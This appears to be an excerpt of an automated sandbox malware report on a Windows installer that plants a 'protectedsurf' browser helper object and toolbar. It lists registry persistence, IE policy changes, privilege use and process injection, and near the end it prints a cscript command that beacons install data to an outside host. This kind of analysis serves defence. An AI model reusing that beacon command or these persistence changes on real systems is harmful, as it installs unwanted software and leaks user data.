Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\AppName = "FrameworkEngine.exe"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C} = "protectedsurf"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FrameworkEngine.exe = "10000"	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

Modifies registry class 64 IoCs

Processes:

FrameworkEngine.exeregsvr32.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\protectedsurf"	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\Implemented Categories	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\ProxyStubClsid32	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\FLAGS	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A80CE7BD-DD6F-414B-B19C-D19176054B7A}\TypeLib\ = "{9D1486DE-B44E-4995-90EA-1946199E1EAF}"	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32\ = "C:\\Program Files (x86)\\protectedsurf\\FrameworkBHO.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\0\win64	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\TypeLib\ = "{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\ = "protectedsurf BHO"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A80CE7BD-DD6F-414B-B19C-D19176054B7A}\Version	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\ = "IKangoEngine"	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\Version	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\ = "IKangoBHO"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\ = "IKangoBHO"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A80CE7BD-DD6F-414B-B19C-D19176054B7A}\Programmable	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\TypeLib\ = "{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\ = "protectedsurf"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A80CE7BD-DD6F-414B-B19C-D19176054B7A}\LocalServer32\ = "\"C:\\Program Files (x86)\\protectedsurf\\FrameworkEngine.exe\""	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\ProxyStubClsid32	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\Programmable	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\TypeLib\ = "{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\1.0\HELPDIR	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\Implemented Categories	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\protectedsurf"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A80CE7BD-DD6F-414B-B19C-D19176054B7A}\TypeLib	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\ = "IKangoEngine"	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}\TypeLib\Version = "1.0"	FrameworkEngine.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\ = "Framework 1.0 Type Library"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9CE7731D-6450-46CF-8498-4C35E88FEA32}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9D1486DE-B44E-4995-90EA-1946199E1EAF}\1.0\0\win32\ = "C:\\Program Files (x86)\\protectedsurf\\FrameworkEngine.exe"	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332}\Programmable	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}\1.0\0\win64\ = "C:\\Program Files (x86)\\protectedsurf\\FrameworkBHO64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A8ADE76E-DD8C-4150-BEBF-1491FD05827A}	FrameworkEngine.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4F91404-D00B-4BF5-88DE-AD533C0F66C5}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E207D57-C861-4D7F-B689-D0EAB73F390C}\ = "IKangoToolbar"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E8C7D5F-C852-4D43-94FF-F1EAB93F130C}\Version	regsvr32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exewd.exe

pid	process
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2764	wd.exe
2764	wd.exe
2764	wd.exe
2764	wd.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

pwdg.exe

description	pid	process
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe
Token: SeDebugPrivilege	5048	pwdg.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pwdg.exe

pid process

5048 pwdg.exe
5048 pwdg.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pwdg.exe

pid process

5048 pwdg.exe
5048 pwdg.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

bservice.exebservice64.exe

pid process

4412 bservice.exe
1708 bservice64.exe

pid	process
5048	pwdg.exe
5048	pwdg.exe

pid	process
5048	pwdg.exe
5048	pwdg.exe

pid	process
4412	bservice.exe
1708	bservice64.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.execscript.exenet.exeupdater.exeupdater.execscript.execscript.exe

description	pid	process	target process
PID 2288 wrote to memory of 1960	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1960	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1960	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 4920	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 4920	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 4920	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 4920 wrote to memory of 1412	4920	cscript.exe	SoftwareDetector.exe
PID 4920 wrote to memory of 1412	4920	cscript.exe	SoftwareDetector.exe
PID 4920 wrote to memory of 1412	4920	cscript.exe	SoftwareDetector.exe
PID 4920 wrote to memory of 516	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 516	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 516	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 4240	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 4240	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 4240	4920	cscript.exe	sqlite3.exe
PID 4920 wrote to memory of 4660	4920	cscript.exe	storageedit.exe
PID 4920 wrote to memory of 4660	4920	cscript.exe	storageedit.exe
PID 4920 wrote to memory of 4660	4920	cscript.exe	storageedit.exe
PID 2288 wrote to memory of 224	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	net.exe
PID 2288 wrote to memory of 224	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	net.exe
PID 2288 wrote to memory of 224	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	net.exe
PID 224 wrote to memory of 2308	224	net.exe	net1.exe
PID 224 wrote to memory of 2308	224	net.exe	net1.exe
PID 224 wrote to memory of 2308	224	net.exe	net1.exe
PID 2288 wrote to memory of 3852	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	Updater.exe
PID 2288 wrote to memory of 3852	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	Updater.exe
PID 2288 wrote to memory of 3852	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	Updater.exe
PID 2288 wrote to memory of 3700	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 2288 wrote to memory of 3700	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 2288 wrote to memory of 3700	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 3700 wrote to memory of 3708	3700	updater.exe	updater.exe
PID 3700 wrote to memory of 3708	3700	updater.exe	updater.exe
PID 3700 wrote to memory of 3708	3700	updater.exe	updater.exe
PID 2288 wrote to memory of 4524	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 2288 wrote to memory of 4524	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 2288 wrote to memory of 4524	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	updater.exe
PID 4524 wrote to memory of 2276	4524	updater.exe	updater.exe
PID 4524 wrote to memory of 2276	4524	updater.exe	updater.exe
PID 4524 wrote to memory of 2276	4524	updater.exe	updater.exe
PID 2288 wrote to memory of 1152	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1152	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1152	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 1152 wrote to memory of 4440	1152	cscript.exe	SoftwareDetector.exe
PID 1152 wrote to memory of 4440	1152	cscript.exe	SoftwareDetector.exe
PID 1152 wrote to memory of 4440	1152	cscript.exe	SoftwareDetector.exe
PID 2288 wrote to memory of 1228	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1228	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1228	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 1228 wrote to memory of 2936	1228	cscript.exe	SoftwareDetector.exe
PID 1228 wrote to memory of 2936	1228	cscript.exe	SoftwareDetector.exe
PID 1228 wrote to memory of 2936	1228	cscript.exe	SoftwareDetector.exe
PID 1228 wrote to memory of 4400	1228	cscript.exe	gpedit.exe
PID 1228 wrote to memory of 4400	1228	cscript.exe	gpedit.exe
PID 1228 wrote to memory of 4400	1228	cscript.exe	gpedit.exe
PID 2288 wrote to memory of 1652	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1652	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 1652	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	cscript.exe
PID 2288 wrote to memory of 4412	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	bservice.exe
PID 2288 wrote to memory of 4412	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	bservice.exe
PID 2288 wrote to memory of 4412	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	bservice.exe
PID 2288 wrote to memory of 1708	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	bservice64.exe
PID 2288 wrote to memory of 1708	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	bservice64.exe
PID 2288 wrote to memory of 2764	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	wd.exe
PID 2288 wrote to memory of 2764	2288	c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe	wd.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

cscript.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{9CAE7395-64C7-465D-BE3D-4235878F1332} = "1"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID	cscript.exe

C:\Users\Admin\AppData\Local\Temp\c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe
"C:\Users\Admin\AppData\Local\Temp\c462d2e363012cbb22862af11b6023b0244b9e526c670b37f7ea6d677c6cf79e.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\system32\cscript.exe" //Nologo "ping.js" "http://www.installping5.info/installer-run/b2d30cb54a6319e0f028c35ff0441b68/783c77e05498ce500056c842042b599e/xriderexe/7114365/?pid=38991&sub_id=default&uzid=7114365&subid=&pid=2027" "C:\Users\Admin\AppData\Local\Temp\nseF979.tmp\pz_info" ""
2⤵
PID:1960

C:\Windows\SysWOW64\cscript.exe
